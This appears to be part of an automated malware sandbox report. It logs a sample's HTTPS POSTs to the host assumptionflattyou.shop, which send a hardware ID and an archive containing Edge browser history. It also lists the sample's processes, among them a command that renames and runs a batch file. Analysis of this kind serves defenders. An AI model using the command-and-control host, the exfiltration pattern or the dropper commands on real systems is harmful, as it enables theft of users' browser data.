2024-07-24 19:05:17 UTC	895	OUT	Data Raw: ff 95 7c b9 c5 22 00 01 01 1a 6c 65 76 65 6c 64 62 2e 42 79 74 65 77 69 73 65 43 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 18 4d 89 51 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 1f 06 f1 34 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 00 00 00 45 64 67 65 2f 44 65 66 61 75 6c 74 2f 48 69 73 74 6f 72 79 50 4b 01 02 00 Data Ascii: \|"leveldb.BytewiseComparatorPKP{.)PKMQEdge/BrowserVersion.txtPK4% WEdge/dp.txtPKA`Edge/Default/HistoryPK
2024-07-24 19:05:18 UTC	822	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 19:05:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hvssn7ke36e0f39kd6a5oi066d; expires=Sun, 17-Nov-2024 12:51:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61U19%2BtnfZpz8p4uKw%2B4LYSM6HAqWP5cvUYQvLlNJUzv%2BpXlsb6ZPHILxr0L21irpYJpNV957JNh3b4XLbwXuIBLHTC%2BGYJbDXC98CL6eOQBdJt%2F2r%2B12QuXg%2FOZ%2B8k2Hb35O1XSXbaEZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a862e4d89647cab-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 19:05:18 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 19:05:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	64745	172.67.163.54	443	6488	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-24 19:05:19 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20570 Host: assumptionflattyou.shop
2024-07-24 19:05:19 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
2024-07-24 19:05:19 UTC	5239	OUT	Data Raw: 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2024-07-24 19:05:19 UTC	812	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 19:05:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a0nhkse3g6jcee69s6stbupbrk; expires=Sun, 17-Nov-2024 12:51:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUXI7YyfFMll6wuzpDmvr16oSu5qaPj4uuRrx4HXZLWugTYqpljSv8plkHJ%2BAbIZ%2BCVdfzPp89MBiUgVisvmAo0Ze1GQNFUVozbxFPZbx6Bf6n26uc0KPof83Paw7lOS2nfQ27us%2FdVFYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a862e563c2d42bf-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 19:05:19 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 19:05:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	64747	172.67.163.54	443	6488	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-24 19:05:20 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1270 Host: assumptionflattyou.shop
2024-07-24 19:05:20 UTC	1270	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
2024-07-24 19:05:21 UTC	814	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 19:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1gkmkd62gh3fq5or3hjugr2fpt; expires=Sun, 17-Nov-2024 12:52:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pn4UDgdsiZWQwJFbpkG1WXZ41Uh9ba7jji1yJ%2BHh6zob%2FVQtWDoPIG3Qf%2B9F9x0eIl3xvTAJi9HFRVKiD%2FIJ6hXwvxrTy3Bqz07Egk1gzzik33OGrMQW94T0QnJNkDlqba2I09cIjhIt3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a862e6218b432fa-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 19:05:21 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 19:05:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	64748	172.67.163.54	443	6488	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-24 19:05:22 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 555626 Host: assumptionflattyou.shop
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: 3c 9b 78 17 86 d3 a2 3a 2d 03 bd c6 c9 29 96 f2 a6 30 0a 22 3e 86 8e 08 42 94 3f 11 a5 c5 18 da 09 c1 a2 03 3b fa 55 a9 79 4e 6d 8e 89 7c 43 f3 f5 c1 7c 55 b7 f3 56 f8 41 ed d6 31 bb 1f 63 35 46 56 bb 58 b5 9d 77 27 1d 5e 0d 0f ca db bd ce 60 5f b1 fb d1 3a e3 58 ea eb 78 f9 9b 35 8a 31 da 9c aa 65 0b ba af 05 e3 59 b8 a4 54 74 21 ff a2 7f 65 20 59 9d a9 4a b9 f7 12 07 ba 4f c9 d3 9c 46 3a 72 f4 51 54 24 71 ef be 2d b3 47 53 13 0f ba 4b f5 40 cd 67 0c 38 6b 7d 1e 11 74 84 fe 02 74 61 97 16 4d 05 b5 c0 3e 7e 8b a2 67 4c d1 67 17 9c 30 15 de c7 bc fd e6 a5 46 a1 b2 88 9c 5c c4 a5 dd d9 fb 75 fd bc 8e bf 2e 30 31 fa d4 82 ed 90 f2 36 7d 52 fb e1 3b fe c4 bc d9 1a cb 0d 7d cb 34 39 df b0 62 43 8a b7 ec 1b 2d 83 25 e9 bb 65 f3 d1 3e 1a 03 ef a7 52 e5 10 cd e9 Data Ascii: <x:-)0">B?;UyNm\|C\|UVA1c5FVXw'^`_:Xx51eYTt!e YJOF:rQT$q-GSK@g8k}ttaM>~gLg0F\u.016}R;}49bC-%e>R
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: e4 01 67 a3 01 5c 5d 01 9a 64 90 88 fd 08 9a ea 8f 6a 84 9d 2a 7b e0 2d 14 e3 f7 11 ae d9 4e cd bc 52 e8 18 99 95 52 66 2b 8a 2a 11 99 0b c0 63 64 ce ad 69 5f e8 a7 63 60 ad dd 72 1e 6b bb 80 67 97 04 3f 3e b7 ad 00 a2 e2 ac f6 7c 45 7a c0 0f f9 ee ab 03 7f de 3e a2 8c 39 d3 8d cb 36 6b cb d9 b1 8c b0 14 3f ee 42 b0 a3 ef 57 13 e3 44 cc 52 f8 4d 86 61 06 3b e7 0e 92 e7 15 9f a2 01 93 bc 5d a1 07 05 90 f4 3e 05 b6 54 24 65 93 5b 7c 3a 7c 51 d4 0c 5e a9 fc 5d 35 c7 d9 99 5e db bf a6 29 15 f8 19 85 8c f5 f3 bb bd 56 4a 2d 28 f5 06 72 ba 7b 52 3c 2a 52 e7 ad ba 3e d8 3a 12 9f 64 5b f2 99 82 75 6b c1 7a 13 e1 0a 1e 5e ce bf cc ac da 96 91 ba 04 42 1c 22 23 e6 c4 7a 85 79 26 a7 6b ac 39 07 15 33 54 96 ad f6 64 d6 1b 0f 1c 07 b9 16 54 8e f4 fe c4 ed 49 03 63 3b Data Ascii: g\]dj{-NRRf+cdi_c`rkg?>\|Ez>96k?BWDRMa;]>T$e[\|:\|Q^]5^)VJ-(r{R<*R>:d[ukz^B"#zy&k93TdTIc;
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: 70 de 2a 3f cc 75 15 1e 8c 38 d8 bf f9 c1 48 87 57 78 05 3b fe a8 86 b5 df 69 03 22 c7 8f ab 26 59 67 bd 6f ba 05 20 af 7f 24 a7 f6 a2 14 f1 1d 5a 34 7f ec fd 8f d1 ea da 6a 3d 11 11 d6 c5 f3 42 a1 57 8a 25 10 7a 81 66 38 b3 07 5e e8 53 75 5d bb 2e 46 24 a6 08 91 5b 5b b6 4e a7 66 df 8f 74 ff 8c cb 88 d6 f3 b0 9a 6b fa f9 7e b2 4c 29 e6 f4 79 92 db 92 fa c6 17 37 4f 31 6b 16 a1 f1 4f c3 20 d2 1c fa cc ce ee f6 4e 9a 38 8b bb b0 24 0d ed f6 7c ea 9b 9c 58 f5 40 f6 5a 0d 2e 98 68 4c 76 66 26 c8 4b e2 98 71 1e d3 10 31 06 8f 71 15 a8 eb dd fc 12 9a 2e 6d 6e 46 83 61 dd d1 62 41 6a 7d 65 c0 7c f2 2e 45 02 bb 84 7a 64 e8 75 8a 90 19 7e 7e 3e 39 c0 76 76 ce 37 b1 15 4d dc fd 68 40 1a 26 91 c9 ce 64 88 9c 7f d7 72 68 56 91 a4 54 dd 2b 98 30 f5 60 76 4e bb de c8 Data Ascii: p*?u8HWx;i"&Ygo $Z4j=BW%zf8^Su].F$[[Nftk~L)y7O1kO N8$\|X@Z.hLvf&Kq1q.mnFabAj}e\|.Ezdu~~>9vv7Mh@&drhVT+0`vN
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: df d5 47 8d 00 d0 18 c0 6a 57 b1 c9 be 23 23 3f 05 6c 06 1c 7c 42 ae 43 e9 9b 4e 52 2a 82 a2 ad 8e 4b 87 5f f5 28 58 8e a4 3d bc eb 3e 48 1f 9b a4 a6 ca d7 bb 49 2f fc 80 68 8a d8 d0 47 f3 a3 33 c0 67 a0 f3 8e 40 fb ff 2b 8b ad 49 ff fb 93 23 13 e4 93 b8 a2 60 94 4c c3 ae 7a 0c a7 d3 53 80 cd 08 f6 f4 0f 81 14 5e 90 95 6b 1c c5 38 05 48 b3 79 3e 9c 46 d3 33 31 d1 f0 c7 d9 d8 33 61 0a 40 02 c5 38 25 e4 aa 82 54 ce 92 5b 47 39 76 45 3d 88 0c 15 03 67 dd d2 b1 b0 5a d8 0d a9 95 df 6e 28 6a 54 b0 18 ea 56 cd 69 5a 1c ca 01 24 bf 75 6b a4 30 0d 1d 21 8c 28 71 dc 78 00 d9 93 50 2f 27 e8 57 da dc 34 1f 1b 9a 7d bd 8d 44 ca 1f c4 4d 52 29 71 9b b7 9e 31 bb 24 f8 ec e4 d3 9f aa 41 ae 42 04 e9 b0 53 7e a0 74 99 d6 c2 77 a4 de 62 b6 4e cc 55 5a b6 ad 83 9e a9 79 e1 Data Ascii: GjW##?l\|BCNR*K_(X=>HI/hG3g@+I#`LzS^k8Hy>F313a@8%T[G9vE=gZn(jTViZ$uk0!(qxP/'W4}DMR)q1$ABS~twbNUZy
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: e8 77 f1 9b 8d 01 9d aa aa 0b e8 bc be 54 67 97 6f 07 77 b3 8a 6e 84 fe cc 0e 54 3b 29 0b 3d dd 4f d5 7d b2 c5 7c 3b d8 d3 56 2f df fc 9f 3e 55 64 ba 02 44 55 c2 01 b3 bf e4 cd 2c a7 0c 67 88 96 47 f5 19 57 39 b4 44 04 e7 c9 89 70 de e1 41 14 1c a7 c1 ee da 83 43 21 bc e4 c7 27 a5 0b c5 87 4d ce bd ef df 0e 0e de b6 78 84 f3 df 78 f0 20 7c 71 10 c4 3e 80 6f 44 bb f0 60 fc 8e 55 5a c9 c7 99 32 9d 5b 55 c0 49 92 84 ca 3c 19 a8 a6 7c 87 c8 26 69 51 5b 07 11 9d 45 54 a0 47 1f 59 0a f2 9b bf 09 9a b9 1d 2d 9b 36 98 92 2b 38 5a bd 50 96 c7 dd a6 a0 e6 43 21 63 b3 48 ad 18 15 b2 fc 08 85 a9 d1 e9 b9 49 5c 24 80 01 cc 0e f6 f3 6d 36 8a 4c 29 6c 3c 44 ed 46 35 54 09 c6 41 2a 93 2d 07 50 95 c9 2a cd 6f ff 36 0b 16 80 3d 51 b0 3e 57 f0 d7 23 58 92 d4 f3 a7 11 c5 31 Data Ascii: wTgownT;)=O}\|;V/>UdDU,gGW9DpAC!'Mxx \|q>oD`UZ2[UI<\|&iQ[ETGY-6+8ZPC!cHI\$m6L)l<DF5TA-Po6=Q>W#X1
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: 5f b4 dc 36 e7 fa cc 6f e1 51 b0 4e bf 5f 41 02 a8 58 fb f7 c1 57 c6 8d a6 b4 9d bb 19 d7 de 46 33 e8 1c 88 33 d5 55 f4 1d 62 4a b7 f7 25 ee 37 0e 58 b0 1f 22 a7 8d fb 52 8e 3e 76 29 55 b9 ec 5c 7e e0 c9 5a c0 54 cb a3 05 6f d5 d9 3c 29 50 7c 55 f7 e4 9b 8e 20 c6 27 ce 6e 01 94 76 c5 ca 0d ce 4a 7e 66 73 5f d0 7e 14 95 1d 70 c0 6e 56 90 52 f6 bf 31 ad 07 81 3d 6e 83 30 64 3a 9b 00 f2 79 49 ea 5a c7 07 d8 7d e1 26 c0 04 a6 00 aa a8 2b 4d 84 e0 0c 75 7c 50 69 11 2d e3 e7 eb 71 a2 f3 9f de 12 48 2e ff 37 e6 20 de c9 65 65 23 24 8c 55 42 ac 56 79 e3 e3 67 31 e7 dc a0 46 51 90 73 07 74 7f 76 56 64 6a 73 3c 0e f8 fe ac 96 03 a8 45 a1 d5 01 c9 a0 92 0f a0 b9 36 d8 8c d4 fc 81 60 77 10 16 5d 7e d7 db fe 61 f3 15 35 f1 2a b5 5b 7d b2 7d c7 fa f7 33 b0 bd 2d 2d fa Data Ascii: _6oQN_AXWF33UbJ%7X"R>v)U\~ZTo<)P\|U 'nvJ~fs_~pnVR1=n0d:yIZ}&+Mu\|Pi-qH.7 ee#$UBVyg1FQstvVdjs<E6`w]~a5*[}}3--
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: 03 1a a7 d8 19 f7 5c 44 2b e5 b0 2b f2 35 6e 71 02 83 52 3d 61 97 76 c9 f7 32 90 ef 99 87 da 20 70 c5 2a df 6b f9 65 75 93 58 14 4b f2 18 02 f3 d8 67 fc 46 3a 8b 9d 0d 0b be b4 d7 46 fa 9f 26 a7 cb f5 84 95 88 31 9d 43 f3 80 4d 85 6c 45 52 f2 4c d2 e3 ee 4c 9b a6 da 1b 5e 2f ec 78 4d 72 7c 49 9a 82 ea 14 35 a0 80 19 9a 49 6f a4 74 33 91 00 d1 2e f1 fd 14 c9 7d 04 3d ee 49 e5 05 df 87 d1 c5 e8 a8 41 3c 70 2b 39 01 e7 75 7f 8c 39 7f 4d c8 59 4f 4f 19 7d ed 7c af b4 c6 03 4e a3 5e 7d 2c 35 1f a3 8f 9b d5 e1 19 17 eb 89 4b da 25 b5 35 3e 64 ac f3 11 0a ec 96 42 5d 9f 5f 70 78 2d 08 32 e5 80 80 63 97 1e 66 eb bc d5 9b 6b 9d 0f 87 df df 33 1d a8 f7 d8 bb 2f 47 33 91 8c ec fd 05 14 84 e2 41 e3 4f 1f a0 d1 30 e1 77 b5 83 6e ac 98 ee 6a 10 78 21 26 6a 65 ec 39 66 Data Ascii: \D++5nqR=av2 p*keuXKgF:F&1CMlERLL^/xMr\|I5Iot3.}=IA<p+9u9MYOO}\|N^},5K%5>dB]_px-2cfk3/G3AO0wnjx!&je9f
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: e1 19 a7 f0 ae 8c 5f 50 d5 03 74 1e 12 64 8e cb bd a7 e6 8d 1a 88 61 3b dc 8d c6 5b 2c e1 b7 86 91 21 e7 ae 54 79 55 62 80 28 63 a5 9f b4 fa 81 8e 64 65 ea 68 d8 cb e4 aa e2 79 03 02 84 70 2f 73 a6 3e d1 56 21 04 0e 89 e5 6f e7 d6 dc c0 84 4d ee b7 38 68 16 23 15 49 1a 6b fb 5b a7 4f d7 20 99 cd eb c5 09 d4 c9 78 99 a2 e3 9b 29 bf 71 d9 2f c9 72 7f af 60 21 c9 f9 53 9c d4 30 2a 8a 9a f2 5a 29 a1 89 77 7b 8e 37 bb 94 bb 7f b0 02 13 0a 82 c5 d8 9b 9e 55 95 c4 89 df b3 dd 78 2d 3b fa 4c 5d b7 33 80 7f 6d 3d 68 5d ff 2f 09 65 a6 09 e5 df a9 18 1b f8 2e a3 ed ce 13 9b ea 4f d9 a7 92 0e fe 14 95 9e 39 45 38 8f bd 66 9a d6 2c b5 91 b4 31 ef fb d6 bc e6 d9 82 1c 4a 35 a5 19 b4 07 e8 40 69 25 02 a3 2c b7 65 7c 0f ac 21 ea 2a 4b 70 4d 4d c9 a7 db 56 7e 36 29 e2 be Data Ascii: _Ptda;[,!TyUb(cdehyp/s>V!oM8h#Ik[O x)q/r`!S0Z)w{7Ux-;L]3m=h]/e.O9E8f,1J5@i%,e\|!KpMMV~6)
2024-07-24 19:05:22 UTC	15331	OUT	Data Raw: ac 70 15 24 3e 21 26 1e 45 e0 ee 10 e1 bd 48 55 fe a4 de 55 f2 ab d3 92 11 0f 20 ea 89 9f 49 95 c7 bb f5 b0 60 d2 39 69 21 a3 09 a1 4c a4 9c 4a 16 d7 48 4d 1d 53 25 d7 4c 92 18 3b 95 13 6d 02 c1 b1 50 f4 ea c8 52 20 d9 10 48 82 da 42 1a 7a 69 a2 a0 36 dc 62 af bd 2a f3 dc 0e d7 ac ea 32 2a 6c dc b8 68 b4 cc 33 17 b3 8e e1 0f 79 b9 f8 ce fe 3c 49 9b 1a ef a6 a8 9b 84 bb 23 ce 52 d7 f2 a0 0c 61 04 3f e3 1e b5 9b b8 02 66 91 8f 60 25 aa c6 b1 4a 78 49 04 1b dd df 33 53 3c d6 17 29 01 4e b6 f6 3e 35 02 59 56 e7 59 c4 bb 94 4c 54 e2 50 aa 98 d0 f9 5d 89 80 ae 1f 1d 1a fb f7 11 c4 f4 5b f5 99 ba a3 f0 c1 14 50 1d 25 b9 ae ca ec b8 cf 4a 98 08 2f 4a ea fa de b7 36 a7 ad ba 00 5a 03 fc e3 3e dc d7 e8 f8 02 64 8a 45 80 55 cb b8 32 75 02 27 40 9a 03 df 90 5a c9 57 Data Ascii: p$>!&EHUU I`9i!LJHMS%L;mPR HBzi6b2lh3y<I#Ra?f`%JxI3S<)N>5YVYLTP][P%J/J6Z>dEU2u'@ZW
2024-07-24 19:05:23 UTC	816	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 19:05:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kbdnnehiurikrtlsag1e9c4jpl; expires=Sun, 17-Nov-2024 12:52:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fnihs6eDJg46AnZspR0qK1aZyt7li1qN8cRCWjrUY08J%2BOka7554iFacdp8Kz5GvD%2B8a5vpUr0AekgcZms8mmMoS7JWCyg8pwkUMpuhJ07rnFgCU3%2FBe7djcSyNDIzmZIH02%2FJT8LX8jdw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a862e6b29e10cb4-EWR alt-svc: h3=":443"; ma=86400

Target ID:	0
Start time:	15:04:44
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\80441fcf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\80441fcf.exe"
Imagebase:	0x400000
File size:	949'700 bytes
MD5 hash:	D3C1C1A07FC43292E7E29E57C752D4C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:04:44
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:04:45
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:04:45
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:04:46
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x2d0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

